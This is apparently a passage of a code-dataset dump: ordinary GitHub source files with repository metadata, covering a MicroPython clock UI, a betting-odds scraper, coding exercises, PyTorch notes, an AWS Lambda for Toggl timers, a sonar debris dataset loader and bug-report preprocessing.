检测按钮做出反应\n if ButtonSign != 0 and self.is_button_ready == 1:\n self.is_button_ready = 0\n # 返回键\n if ButtonSign == 'n':\n return 0\n # 确认键\n elif ButtonSign == 'y':\n\n temp = self.input_keyboard()\n if temp != 'null' and 1 <= len(temp) <= 2 and temp.isdigit():\n ind = int(temp)\n time_set = self.ds3231_time.copy()\n\n ok = 1\n\n if setting_lis[focus_now] == 'Set Second' and 0 <= ind <= 59:\n time_set[0] = ind\n elif setting_lis[focus_now] == 'Set Minute' and 0 <= ind <= 59:\n time_set[1] = ind\n elif setting_lis[focus_now] == 'Set Hour' and 0 <= ind <= 23:\n time_set[2] = ind\n elif setting_lis[focus_now] == 'Set Week' and 0 <= ind <= 7:\n time_set[3] = ind - 1\n elif setting_lis[focus_now] == 'Set Day' and 0 <= ind <= 31:\n time_set[4] = ind\n elif setting_lis[focus_now] == 'Set Month' and 0 <= ind <= 12:\n time_set[5] = ind\n elif setting_lis[focus_now] == 'Set Year' and 0 <= ind <= 99:\n time_set[6] = ind\n else:\n ok = 0\n\n if ok:\n # 先将10进制当作16进制转换为10进制,因为bytes()会把10进制转换为16进制\n for i in range(len(time_set)):\n time_set[i] = int(str(time_set[i]), 16)\n time_set = bytes(time_set)\n ds3231.SetTime(time_set)\n\n self.init_rtc(mode='update')\n\n self.jump_window(code='Success')\n else:\n self.error_window(code='Wrong Input')\n\n\n # 上\n elif ButtonSign == 'u' or ButtonSign == 'l':\n if focus_now == 0:\n focus_now = len(setting_lis) - 1\n else:\n focus_now -= 1\n # 下\n elif ButtonSign == 'd' or ButtonSign == 'r':\n if focus_now == len(setting_lis) - 1:\n focus_now = 0\n else:\n focus_now += 1\n\n elif ButtonSign == 0 and self.is_button_ready == 0:\n self.is_button_ready = 1\n\n ###主屏幕内容###\n self.clear() # 清除所有\n self.oled_0.text('->', 3, 32) # 箭头\n\n for i in [-2, -1, 0, 1, 2]:\n try:\n if focus_now + i >= 0:\n # 打印选项名\n self.oled_0.text(setting_lis[focus_now + i], 20, 32 + i * 8)\n else:\n pass\n except Exception:\n pass\n\n self.show_fps(s=self.current_time[6]) # 显示fps\n self.show() # 绘制所有\n\n ###副屏幕内容###\n if self.frame_counter == 0:\n self.clear(id=1)\n # 绘制时间\n self.oled_1.text(\"Time=%02d:%02d:%02d\" % (self.current_time[4], self.current_time[5], self.current_time[6]),\n 0, 0)\n # 绘制日期\n self.oled_1.text(\"Date=%d/%02d/%02d\" % (self.current_time[0], self.current_time[1], self.current_time[2]),\n 0, 8)\n # 绘制星期\n self.oled_1.text(\"Day of Week=%s\" % (week_lis[self.current_time[3]]), 0, 16)\n self.show(id=1)\n\n self.fps_limiter(limit=self.fps_limit, frame_count=self.frame_counter, fps=self.fps) # 限制帧数\n\n # 进制转换器\n def fun_UnitConverter(self):\n self.is_init_fps = 0 # fps计数器初始化\n self.is_button_ready = 0 # 按钮复位标志初始化\n self.sec_buffer = self.current_time[6] # 初始化记秒器\n\n self.clear(id=2)\n self.show(id=2) # 清空两个屏幕\n while True:\n self.current_time = self.rtc.datetime() # 获取时间\n\n # 按钮部分\n ButtonSign = self.button_sign() # 获取按钮状态\n # 检测按钮做出反应\n if ButtonSign != 0 and self.is_button_ready == 1:\n self.is_button_ready = 0\n return 0\n\n elif ButtonSign == 0 and self.is_button_ready == 0:\n self.is_button_ready = 1\n\n ###主屏幕内容###\n self.clear() # 清除所有\n # self.draw_border() # 绘制边界\n\n self.show_fps(s=self.current_time[6]) # 显示fps\n self.show() # 绘制所有\n\n ###副屏幕内容###\n\n self.fps_limiter(limit=self.fps_limit, frame_count=self.frame_counter, fps=self.fps) # 限制帧数\n\n # 省电模式\n def fun_PowerSave(self):\n while self.button_sign():\n sleep_ms(300)\n\n print(\"Enter PowerSave Mode\")\n\n # 清除所有画面\n self.clear(id=2)\n self.show(id=2)\n\n self.oled_1.poweroff()\n self.oled_0.contrast(0)\n\n self.button_l.irq(trigger=Pin.IRQ_FALLING, handler=self.PowerSaveClean)\n self.button_r.irq(trigger=Pin.IRQ_FALLING, handler=self.PowerSaveClean)\n self.button_u.irq(trigger=Pin.IRQ_FALLING, handler=self.PowerSaveClean)\n self.button_d.irq(trigger=Pin.IRQ_FALLING, handler=self.PowerSaveClean)\n self.button_y.irq(trigger=Pin.IRQ_FALLING, handler=self.PowerSaveClean)\n self.button_n.irq(trigger=Pin.IRQ_FALLING, handler=self.PowerSaveClean)\n\n self.update_time = 15 * 1000\n self.is_PowerSave = 1\n div = 10\n\n while True:\n if not self.is_PowerSave:\n return 0\n\n self.current_time = ds3231.ReportList() # 获取时间\n ###主屏幕内容###\n self.clear() # 清除所有\n self.text_m(\"%02d:%02d\" % (self.current_time[2], self.current_time[1]), random.randint(0, 56)) # 绘制时间\n self.show() # 绘制所有\n\n for _ in range(div):\n sleep_ms(int(self.update_time/div))\n def PowerSaveClean(self, _):\n print(\"Exit PowerSave Mode\")\n self.button_l.irq(handler=None)\n self.button_r.irq(handler=None)\n self.button_u.irq(handler=None)\n self.button_d.irq(handler=None)\n self.button_y.irq(handler=None)\n self.button_n.irq(handler=None)\n self.is_PowerSave = 0\n self.update_time = 0\n self.oled_1.poweron()\n self.oled_0.contrast(255)\n\n\nif __name__ == '__main__':\n PicoClock()\n","repo_name":"CaliFall/PicoClock","sub_path":"程序源码/PicoClockAlpha.py","file_name":"PicoClockAlpha.py","file_ext":"py","file_size_in_byte":66210,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"18802479270","text":"import requests\n\ndef finder(t1, t2):\n t1_matches = requests.get(f'https://m.melbet.ru/LineFeed/Web_SearchZip?text={t1}&limit=150&lng=ru&partner=195&mode=6')\n t2_matches = requests.get(f'https://m.melbet.ru/LineFeed/Web_SearchZip?text={t2}&limit=150&lng=ru&partner=195&mode=6')\n\n matches1 = t1_matches.json()\n matches2 = t2_matches.json()\n \n matches1 = matches1['Value']\n matches2 = matches2['Value']\n total_t1_b, total_t1_m, total_t2_b, total_t2_m = '~','~','~','~'\n try:\n for match in matches1:\n for match2 in matches2:\n if match2['CI'] == match['CI']:\n LI = match['LI'] # leageu code (first arg)\n CI = match['CI'] # match code\n LE = match['LE'] # league name\n O1 = match['O1E'] # first team\n O2 = match['O2E'] #second team\n \n id_t = requests.get(f'https://m.melbet.ru/LineFeed/GetGameZip?id={CI}&lng=ru&cfview=0&isSubGames=true&GroupEvents=true&countevents=50&partner=195&grMode=2').json()\n\n I = id_t['Value']['SG'][0]['I']\n\n l = O1.split()\n O1 = '-'.join(l)\n l = O2.split()\n O2 = '-'.join(l) \n \n LE = LE.split('.')\n LE = ''.join(LE)\n l = LE.strip('.').split()\n LE = '-'.join(l) \n\n #href = f'https://m.melbet.ru/line/Football/{LI}-{LE}/{CI}-{O1}-{O2}' #https://m.melbet.ru/LineFeed/GetGameZip?id=96230530&lng=ru&cfview=0&isSubGames=true&GroupEvents=true&countevents=50&partner=195&grMode=2\n \n rrrr = requests.get(f'https://m.melbet.ru/LineFeed/GetGameZip?id={I}&lng=ru&cfview=0&isSubGames=true&GroupEvents=true&countevents=200&partner=195&grMode=2').json()\n\n all_params = rrrr['Value']\n all_totals = all_params['GE']\n \n total_t1_b = all_totals[7]['E'][0][0]['C'] \n total_t1_m = all_totals[7]['E'][1][0]['C']\n\n total_t2_b = all_totals[9]['E'][0][0]['C']\n total_t2_m = all_totals[9]['E'][1][0]['C']\n\n except:\n print('no kf')\n\n return total_t1_b, total_t1_m, total_t2_b, total_t2_m\n\n#print(finder())","repo_name":"peter80871/smart","sub_path":"melbet_parser.py","file_name":"melbet_parser.py","file_ext":"py","file_size_in_byte":2400,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"22696679423","text":"\"\"\"\r\nDescribes the metadata database tables, which everything else requires.\r\n\"\"\"\r\n\r\nfrom .tabledef import DbTableDef\r\n\r\nMETADATA_DB_TABLES = {\r\n \"install_status\": DbTableDef(\r\n version=1,\r\n pk=[\"object_id\", \"S\", \"object_type\", \"S\"],\r\n indexes={},\r\n attributes={\r\n \"version\": \"N\",\r\n \"description\": \"B\"\r\n },\r\n stream=False\r\n )\r\n}\r\n","repo_name":"groboclown/whimbrel","sub_path":"installer/whimbrel/install/db/schema_metadata.py","file_name":"schema_metadata.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"31434296939","text":"import heapq\nclass Solution:\n def topKFrequent(self, words: List[str], k: int) -> List[str]:\n answer=[]\n heap=[]\n frequency ={}\n for i in words:\n if i not in frequency:\n frequency[i] =1\n else:\n frequency[i]+=1\n for f in frequency:\n heapq.heappush(heap,[-frequency[f],f]) \n for i in range(k):\n answer.append(heapq.heappop(heap)[1])\n return answer ","repo_name":"MilkiyasGebru/Algorithms","sub_path":"0692-top-k-frequent-words/0692-top-k-frequent-words.py","file_name":"0692-top-k-frequent-words.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"4578302785","text":"'''\nThis file contains the logic for reminding the user to avoid prolonged sitting.\n'''\nimport schedule\nfrom datetime import datetime, timedelta\ndef remind_avoid_sitting(app):\n current_time = datetime.now().strftime(\"%H:%M\")\n # Add your additional logic here, such as sending notifications or displaying reminders in the app\n # Schedule the next reminder\n next_reminder_time = datetime.now() + timedelta(hours=1)\n schedule.every().day.at(next_reminder_time.strftime(\"%H:%M\")).do(lambda: remind_avoid_sitting(app))\n app.reminder_label.config(text=f\"Reminder: It's {current_time}. Avoid prolonged sitting!\\n\" + f\"Next reminder: {next_reminder_time.strftime('%H:%M')}\")\n # Implement your logic to remind the user to avoid prolonged sitting\n# Add the missing import statement for leave_work_reminder","repo_name":"OpenBMB/ChatDev","sub_path":"WareHouse/WarmHeart_ModelBest1024_20231026180801/avoid_sitting_reminder.py","file_name":"avoid_sitting_reminder.py","file_ext":"py","file_size_in_byte":816,"program_lang":"python","lang":"en","doc_type":"code","stars":17466,"dataset":"github-code","pt":"34"} +{"seq_id":"30641863289","text":"from preproce import preprocessing\nfrom prepare_da import prepare_data\nfrom modele import ARIMAModel\n\ndef main():\n \n df = preprocessing(\"C:/Users/sylva/AppData/Local/GitHubDesktop/app-3.2.0/Projet_ARIMA_2023/covid_CIV_dataset_projet.csv\")\n t_train, t_test ,t_validation, y_train, y_test, y_validation=prepare_data(df, 0.6, 0.2)\n \n print(t_train)\n print(t_test)\n print(t_validation)\n \n print(y_train)\n print(y_test)\n print(y_validation)\n model = ARIMAModel(12,1,12,t_train, t_test ,t_validation, y_train, y_test, y_validation)\n model.training()\n model.show_forcast_of_arima_model()\n\n \n \n \nif __name__==\"__main__\": \n \n main()\n \n \n ","repo_name":"Sylou2022/Projet_ARIMA_2023","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":711,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"28470637866","text":"## Welcome to Pytorch\n\n## Import convention seems to be just torch as opposed to how numpy and pandas set to np/pd.\n\nimport torch\nimport numpy as np\nimport pandas as pd\n\n## torch is all about tensors. recall that a tensor is a type of matrix\n# https://medium.com/@quantumsteinke/whats-the-difference-between-a-matrix-and-a-tensor-4505fbdc576c\n\n\na = torch.Tensor([1,2,3,4,5])\nprint(a.dtype)\nprint(a.type())\nprint(a.size())\nprint(a.ndimension())\n\na_col=a.view(5,1)\n\nprint(a_col)\n\na_col=a.view(-1,1)\n\nprint(a_col)\n\na = torch.Tensor([0,1,2,3,4,5])\na_col=a.view(6,1)\nprint(a_col)\n\nnumpy_array=np.array([0.0,1.0,2.0,3.0,4.0])\ntorch_tensor=torch.from_numpy(numpy_array)\nback_to_numpy=torch_tensor.numpy()\n\nprint(numpy_array,torch_tensor,back_to_numpy)\n\npandas_series=pd.Series([0.1,2,0.3,10.1])\npandas_to_torch=torch.from_numpy(pandas_series.values)\n\nprint(pandas_series,pandas_to_torch)\n\na = torch.Tensor([0,1,2,3,4,5])\na_list = a.tolist()\nprint(a_list)\n\na = torch.Tensor([0,1,2,3,4,5])\n\nprint(a[0]) #prints a tensor\nprint(a[0].item()) # prints the number\n\nc = torch.Tensor([10,0.5,20,3])\nprint(c)\nc[0]=100\nprint(c)\nc[3]=10\nprint(c)\nd=c[1:3]\nprint(d)\nd[0]=0\nprint(d)\n\nprint(c)\nc[1:4]=torch.tensor([1,2,3])\nprint(c)\n\n#vector arithmetic\n\nu = torch.tensor([1,0])\nv = torch.tensor([0,1])\nz = u + v\nprint(z)\n\ny = torch.tensor([1,2])\nz = 2*y\nprint(z)\n\nu = torch.tensor([1, 2, 3, -1])\nv = u + 1\nprint(v)\n\nu = torch.tensor([1, 2])\nv = torch.tensor([3, 2])\nz = u*v\nprint(z)\n\n# dot product\n \nu = torch.tensor([1,2])\nv = torch.tensor([3,1])\nz = torch.dot(u,v)\nprint(z)\n\n# the act of adding a scalar to a tensor is called \"broadcasting\"\nu = torch.tensor([1,2,3,-1])\nz = u+1\nprint(z)\n\n\na = torch.tensor([1.0,-1.0,1.0,-1.0])\nmean_a = a.mean()\nprint(mean_a)\n\nb = torch.tensor([1,-2,3,4,5])\nprint(b.max())\n\npi = np.pi\nx = torch.tensor([0, pi/2, pi])\ny = torch.sin(x)\nprint(y)\n\n#return evenly spaced numbers over a specified interval\n#this is pretty neat.\nz = torch.linspace(-2,2, steps=5)\nprint(z)\n\nx=torch.linspace(0,2*pi,100)\ny=torch.sin(x)\n\nimport matplotlib.pyplot as plt\nplt.plot(x.numpy(),y.numpy())\n","repo_name":"nwalker85/coursera-ibm-ai","sub_path":"Course4/Week1/notes.py","file_name":"notes.py","file_ext":"py","file_size_in_byte":2084,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"6438819718","text":"#Given two strings, return True if either of the strings appears at the very end of the other string, ignoring upper/lower case differences (in other words, the computation should not be \"case sensitive\"). Note: s.lower() returns the lowercase version of a string.\r\n#end_other('Hiabc', 'abc') → True\r\n#end_other('AbC', 'HiaBc') → True\r\n#end_other('abc', 'abXabc') → True\r\ndef end_other(string1,string2):\r\n num1 = len(string1)\r\n num2 = len(string2)\r\n string1 = string1.lower()\r\n string2 = string2.lower()\r\n if string1[num2:] == string2[:]:\r\n return True\r\n elif string2[num1:] == string1[:]:\r\n return True\r\n else:\r\n return False\r\nprint('Enter the two string')\r\nstring1 = str(input())\r\nstring2 = str(input())\r\nprint(str(end_other(string1,string2)))\r\n","repo_name":"naveenkewalramani/Coding-Bat-Solutions","sub_path":"coding bat/string2/String_2_end_other.py","file_name":"String_2_end_other.py","file_ext":"py","file_size_in_byte":808,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"14393733449","text":"\"\"\"\n1 - Faça um programa que leia um número inteiro e o imprima.\n\"\"\"\n\nnumero_inteiro = int(input(\"Digite um número: \"))\nprint(numero_inteiro)\n\n\"\"\"\n2 - Faça um programa que leia um número real e o imprima.\n\"\"\"\n\nnumero_real = float(input(\"Digite um numero: \"))\nprint(numero_real)\n\n\"\"\"\n3 - Peça ao usuário para digitar três valores inteiros e imprima a soma deles.\n\"\"\"\n\nnumero1 = int(input(\"Digite o primeiro número: \"))\nnumero2 = int(input(\"Digite o segundo número: \"))\nnumero3 = int(input(\"Digite o terceiro número: \"))\nsoma = numero1 + numero2 + numero3\n\nprint('\\n',soma)\n\n\"\"\"\n4 - Leia um numero real e imprima o resultado do quadrado desse número.\n\"\"\"\n\nquadrado = float(input(\"Digite um número: \"))\nqd = quadrado ** 2\n\nprint('\\n',qd)\n\n\"\"\"\n5 - Leia um número real e imprima a quinta parte deste número.\n\"\"\"\n\nnumero = float(input(\"Digite um número: \"))\nquinta_parte = numero // 5\n\nprint('\\n',quinta_parte)\n\n","repo_name":"cristinamais/exercicios_python","sub_path":"Exercicios Variaveis e tipos de dados/exercicio 01 seção 04.py","file_name":"exercicio 01 seção 04.py","file_ext":"py","file_size_in_byte":922,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"14494506274","text":"f = open(\"../input/day10input.txt\", \"r\")\n# f = open(\"testinput/day10test.txt\", \"r\")\nlines = [int(l.strip()) for l in f.readlines()]\nlines.append(0)\nlines = sorted(lines)\nlines.append(max(lines) + 3)\n\none_diff = 0\nthree_diff = 0\n\nfor i in range(len(lines) - 1):\n delta = lines[i + 1] - lines[i]\n if delta == 1:\n one_diff += 1\n elif delta == 3:\n three_diff += 1\n\nmemo = {}\n\n\ndef dp(n):\n if n == len(lines) - 1:\n return 1\n if n in memo:\n return memo[n]\n ans = 0\n for j in range(n + 1, len(lines)):\n if lines[j] - lines[n] <= 3:\n ans += dp(j)\n memo[n] = ans\n return ans\n\n\nprint(\"part1\", one_diff * three_diff)\nprint(\"part2\", dp(0))\n","repo_name":"ra-res/advent-of-code-2020","sub_path":"src/Day10.py","file_name":"Day10.py","file_ext":"py","file_size_in_byte":701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"20932964655","text":"import json\nimport os\n\nimport logging\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.INFO)\n\nformatter = logging.Formatter('[%(levelname)s | %(name)s:%(lineno)d] %(message)s')\nhandler = logging.StreamHandler()\nhandler.setFormatter(formatter)\nlogger.addHandler(handler)\n\n\n\ndef lambda_handler(event, context):\n # The event parameter is a dict containing the message payload\n logger.info(\"Received event: \" + json.dumps(event))\n\n previous_state = event.get('previous', {}).get('state', {}).get('desired', {}).get('timer_state', '')\n new_state = event.get('current', {}).get('state', {}).get('desired', {}).get('timer_state', '')\n\n if previous_state and new_state and (previous_state != new_state):\n logger.info(\"New desired state reported: \" + json.dumps(new_state))\n\n TOGGL_WID = int(os.getenv('TOGGL_WID'))\n from toggl_api_utils import start_timer, stop_timer\n\n description = ''\n\n # If the timer_state is 'STOPPED' - stop a timer on Toggl\n if new_state in ['STOPPED', 'PAUSED', 'REST']:\n logger.info(\"The device timer is now STOPPED/PAUSED/REST - stop the Toggl\")\n result = stop_timer(TOGGL_WID)\n logger.info(f'stop_timer result:{result}')\n elif new_state == 'POMODORO':\n logger.info(\"The device timer is now POMODORO - start the Toggl\")\n project_name, color = start_timer(TOGGL_WID)\n logger.info(f'start_timer {project_name}')\n description = project_name\n if not description:\n description = ''\n else:\n logger.info(f\"The device timer is now {new_state} - do nothing\")\n\n # Update the device shadow\n THING_NAME = os.getenv('THING_NAME')\n payload = {\n \"state\" : {\n \"desired\": {\n \"description\" : description\n },\n \"reported\": {\n \"description\" : description\n }\n }\n }\n logger.info(f\"Updating device shadow with description payload: {payload}\")\n from mqtt_utils import update_device_shadow\n update_device_shadow(THING_NAME, payload)\n\n # Return a success response\n return {'status': 'success'}\n","repo_name":"ChistokhinSV/M5Pomodoro","sub_path":"toggl-webhook/timer_lambda/timer.py","file_name":"timer.py","file_ext":"py","file_size_in_byte":2257,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"43340333915","text":"student_name = []\nmath_marks = []\nscience_marks = []\nhindi_marks = []\nenglish_marks = []\ncomputer_marks = []\nfinal = []\nfor i in range(1,11):\n name = input(\"Enter name of {}th student: \".format(i))\n student_name.append(name)\n math = int(input(\"Enter math marks: \"))\n math_marks.append(math)\n science = int(input(\"Enter Science Marks: \"))\n science_marks.append(science)\n hindi = int(input(\"Enter Hindi Marks: \"))\n hindi_marks.append(hindi)\n english = int(input(\"Enter English Marks: \"))\n english_marks.append(english)\n computer = int(input(\"Enter Computer Marks: \"))\n computer_marks.append(computer)\n final.append(name)\n final.append(math)\n final.append(science)\n final.append(hindi)\n final.append(english)\n final.append(computer)\nchoice = int(input(\"Which student's marks you want to see?(1 to 10): \"))\nj = 6*(choice-1)\nprint(\"{} has {} marks in Maths, {} marks in Science, {} marks in Hindi, {} marks in English, {} marks in Computer\".format(final[j],final[j+1],final[j+2],final[j+3],final[j+4],final[j+5]))","repo_name":"himanshu-957/30DaysofPython","sub_path":"Day02/StudentInfo.py","file_name":"StudentInfo.py","file_ext":"py","file_size_in_byte":1062,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"29901951897","text":"import numpy as np\nimport cv2\n\nimport os\nimport glob\nimport pathlib\n\nOBJECT_CLASES = [\n \"bottle\",\n \"can\",\n \"carton\",\n \"box\",\n \"bidon\",\n \"pipe\",\n \"platform\",\n \"propeller\",\n \"sachet\",\n \"tire\",\n \"valve\",\n \"wrench\"\n]\n\nMATERIAL_CLASSES = [\n \"plastic\",\n \"metal\",\n \"rubber\",\n \"glass\",\n \"cardboard\",\n \"platform\"\n]\n\nMATERIAL_OBJECT_MAPPING = {\n \"plastic\": [\"drink-sachet\", \"plastic-bidon\", \"plastic-bottle\", \"plastic-pipe\", \"plastic-propeller\"],\n \"metal\": [\"can\", \"metal-bottle\", \"metal-box\", \"valve\", \"wrench\"],\n \"rubber\": [\"large-tire\", \"small-tire\"],\n \"glass\": [\"brown-glass-bottle\", \"glass-bottle\", \"glass-jar\", \"potion-glass-bottle\"],\n \"cardboard\": [\"drink-carton\"],\n \"platform\": [\"rotating-platform\"]\n}\n\nOBJECT_CLASS_MAPPING = {\n \"bottle\": [\"plastic-bottle\", \"metal-bottle\", \"glass-bottle\", \"potion-glass-bottle\"],\n \"can\": [\"can\"],\n \"carton\": [\"drink-carton\"],\n \"box\": [\"metal-box\"],\n \"bidon\": [\"plastic-bidon\"],\n \"pipe\": [\"plastic-pipe\"],\n \"platform\": [\"rotating-platform\"],\n \"propeller\": [\"plastic-propeller\"],\n \"sachet\": [\"drink-sachet\"],\n \"tire\": [\"large-tire\", \"small-tire\"],\n \"valve\": [\"valve\"],\n \"wrench\": [\"wrench\"]\n}\n\nINDIVIDUAL_OBJECT_CLASSES = [\n \"brown-glass-bottle\", \"drink-carton\", \"glass-bottle\", \"large-tire\", \"metal-box\", \"plastic-bottle\", \"plastic-propeller\", \"rotating-platform\", \"valve\", \"can\",\n \"drink-sachet\", \"glass-jar\", \"metal-bottle\", \"plastic-bidon\", \"plastic-pipe\", \"potion-glass-bottle\", \"small-tire\", \"wrench\"\n]\n\nTURNTABLE_DATA_FOLDER = os.path.join(pathlib.Path(__file__).parent.absolute() ,\"data/turntable-cropped\")\n\nVALID_DATASETS = [\"turntable\"]\nVALID_CROPS = [\"platform\", \"object\"]\nVALID_TASKS = [\"object_classes\", \"individual_objects\", \"materials\"]\n\nSPLIT_SEED = 42\n\ndef load_debris_dataset(dataset=\"turntable\", task=\"object_classes\", crop=\"platform\", image_size = (96, 96), split=None, add_channels_dim=True):\n \"\"\"\n Loads the dataset from disk and returns all images in the specified task.\n\n Valid tasks are:\n - object_classes Classes correspond to the high level objects like can, bottle, tire, valve, wrench, etc.\n - individual_objects Individual objects are each its own class (18 in total).\n - materials Classes correspond to the physical materials in the objects (like plastic, metal, rubber, glass, cardboard)\n\n Valid crops can be:\n - platform Use image crops containing both the rotating platform and the object.\n - object Use image crops only containing the object.\n \"\"\"\n\n assert dataset in VALID_DATASETS\n assert task in VALID_TASKS\n assert crop in VALID_CROPS\n\n if task == \"object_classes\":\n object_images, object_labels = load_turntable_objects(OBJECT_CLASS_MAPPING, OBJECT_CLASES, image_size, crop)\n\n return make_split(object_images, object_labels, split)\n\n if task == \"individual_objects\":\n object_images, object_labels = load_turntable_objects({x: x for x in INDIVIDUAL_OBJECT_CLASSES},\n INDIVIDUAL_OBJECT_CLASSES, image_size, crop)\n\n return make_split(object_images, object_labels, split)\n\n if task == \"materials\":\n object_images, object_labels = load_turntable_objects(MATERIAL_OBJECT_MAPPING, MATERIAL_CLASSES, image_size, crop)\n\n return make_split(object_images, object_labels, split)\n\n raise NotImplementedError()\n\ndef class_names(dataset, task):\n pass\n\ndef make_split(object_images, object_labels, split_type, random_seed=None, add_channels_dim=True):\n if split_type is None:\n x_all = np.concatenate(object_images, axis=0)\n y_all = np.concatenate(object_labels, axis=0)\n\n if add_channels_dim:\n x_all = np.expand_dims(x_all, axis=3)\n\n return x_all, y_all\n\n if split_type == \"70/30\":\n from sklearn.model_selection import train_test_split\n\n x_all = np.concatenate(object_images, axis=0)\n y_all = np.concatenate(object_labels, axis=0)\n\n x_train, x_test, y_train, y_test = train_test_split(x_all, y_all, shuffle=True, test_size=0.3, random_state=SPLIT_SEED)\n\n if add_channels_dim:\n x_train = np.expand_dims(x_train, axis=3)\n x_test = np.expand_dims(x_test, axis=3)\n\n return x_train, y_train, x_test, y_test\n\n #if split_type == \"sequence\":\n \n\ndef load_turntable_objects(dataset_map, class_names, size, crop):\n object_images, object_labels = [], []\n\n for class_name, objects in dataset_map.items():\n for object_name in objects:\n obj_images = load_turntable_individual_object(object_name, size, crop)\n label = class_names.index(class_name)\n\n for obj in obj_images:\n object_images.append(obj)\n object_labels.append([label] * len(obj))\n\n return object_images, object_labels\n\ndef load_turntable_individual_object(object_name, size, crop=\"platform\"):\n \"\"\"\n Loads all images for a particular object in the dataset.\n \"\"\"\n \n assert crop in VALID_CROPS\n\n standing_glob_pattern = \"{}/{}/{}-standing-frame-*.png\".format(TURNTABLE_DATA_FOLDER, object_name, crop)\n sideways_glob_pattern = \"{}/{}/{}-sideways-frame-*.png\".format(TURNTABLE_DATA_FOLDER, object_name, crop)\n\n standing_files = glob.glob(standing_glob_pattern)\n sideways_files = glob.glob(sideways_glob_pattern)\n\n standing_num_files = len(standing_files)\n sideways_num_files = len(sideways_files)\n\n standing_file_pattern = \"{}/{}/{}-standing-frame-{:03}.png\"\n sideways_file_pattern = \"{}/{}/{}-sideways-frame-{:03}.png\"\n\n standing_images = []\n sideways_images = []\n\n for i in range(standing_num_files):\n filepath = standing_file_pattern.format(TURNTABLE_DATA_FOLDER, object_name, crop, i)\n image = cv2.imread(filepath, flags=cv2.IMREAD_GRAYSCALE)\n image = cv2.resize(image, dsize=size, interpolation=cv2.INTER_LINEAR)\n\n standing_images.append(image)\n\n for i in range(sideways_num_files):\n filepath = sideways_file_pattern.format(TURNTABLE_DATA_FOLDER, object_name, crop, i)\n image = cv2.imread(filepath, flags=cv2.IMREAD_GRAYSCALE)\n image = cv2.resize(image, dsize=size, interpolation=cv2.INTER_LINEAR)\n\n sideways_images.append(image)\n\n if standing_num_files > 0 and sideways_num_files > 0:\n return [np.array(standing_images), np.array(sideways_images)]\n\n if standing_num_files > 0 and sideways_num_files == 0:\n return [np.array(standing_images)]\n\n if sideways_num_files > 0 and standing_num_files == 0:\n return [np.array(sideways_images)]\n\n raise ValueError(\"No images found\")","repo_name":"mvaldenegro/marine-debris-fls-datasets","sub_path":"md_fls_dataset/loader.py","file_name":"loader.py","file_ext":"py","file_size_in_byte":6729,"program_lang":"python","lang":"en","doc_type":"code","stars":55,"dataset":"github-code","pt":"34"} +{"seq_id":"36098826887","text":"import argparse\nimport cPickle as pickle\nimport json\nimport os\nimport random\nimport re\nfrom collections import defaultdict\n\nimport nltk\nfrom tqdm import tqdm\n\nparser = argparse.ArgumentParser()\nparser.add_argument('-d', '--data', type=str, default='../data/eclipse')\nparser.add_argument('-r', '--ratio', type=float, default=0.9)\nparser.add_argument('-wv', '--word_vocab', type=int, default=20000)\nparser.add_argument('-cv', '--char_vocab', type=int, default=100)\nargs = parser.parse_args()\n\nUNK = 1\n\ndef read_pairs():\n bug_pairs = []\n bug_ids = set()\n with open(os.path.join(args.data, 'pairs.json'), 'r') as f:\n count = 0\n for line in f:\n count += 1\n if count > 10000:\n break\n\n pair = json.loads(line)\n bug_pairs.append((int(pair['bug1']), int(pair['bug2'])))\n bug_ids.add(int(pair['bug1']))\n bug_ids.add(int(pair['bug2']))\n with open(os.path.join(args.data, 'bug_pairs.txt'), 'w') as f:\n for pair in bug_pairs:\n f.write(\"%d %d\\n\" % pair)\n bug_ids = sorted(bug_ids)\n with open(os.path.join(args.data, 'bug_ids.txt'), 'w') as f:\n for bug_id in bug_ids:\n f.write(\"%d\\n\" % bug_id)\n return bug_pairs, bug_ids\n\n\ndef func_name_tokenize(text):\n s = []\n for i, c in enumerate(text):\n if c.isupper() and i > 0 and text[i-1].islower():\n s.append(' ')\n s.append(c)\n return ''.join(s).strip()\n\n\ndef normalize_text(text):\n try:\n tokens = re.compile(r'[\\W_]+', re.UNICODE).split(text)\n text = ' '.join([func_name_tokenize(token) for token in tokens])\n text = re.sub(r'\\d+((\\s\\d+)+)?', 'number', text)\n except:\n return 'description'\n return ' '.join([word.lower() for word in nltk.word_tokenize(text)])\n\n\ndef save_dict(set, filename):\n with open(os.path.join(args.data, filename), 'w') as f:\n for i, item in enumerate(set):\n f.write('%s\\t%d\\n' % (item, i))\n\n\ndef load_dict(filename):\n dict = {}\n with open(os.path.join(args.data, filename), 'r') as f:\n for line in f:\n tokens = line.split('\\t')\n dict[tokens[0]] = tokens[1]\n return dict\n\n\ndef normalized_data(bug_ids):\n products = set()\n bug_severities = set()\n priorities = set()\n versions = set()\n components = set()\n bug_statuses = set()\n text = []\n normalized_bugs = open(os.path.join(args.data, 'normalized_bugs.json'), 'w')\n with open(os.path.join(args.data, 'bugs.json'), 'r') as f:\n count = 0\n loop = tqdm(f)\n for line in loop:\n bug = json.loads(line)\n bug_id = int(bug['bug_id'])\n if bug_id not in bug_ids:\n continue\n\n count += 1\n loop.set_postfix(count=count)\n\n products.add(bug['product'])\n bug_severities.add(bug['bug_severity'])\n priorities.add(bug['priority'])\n versions.add(bug['version'])\n 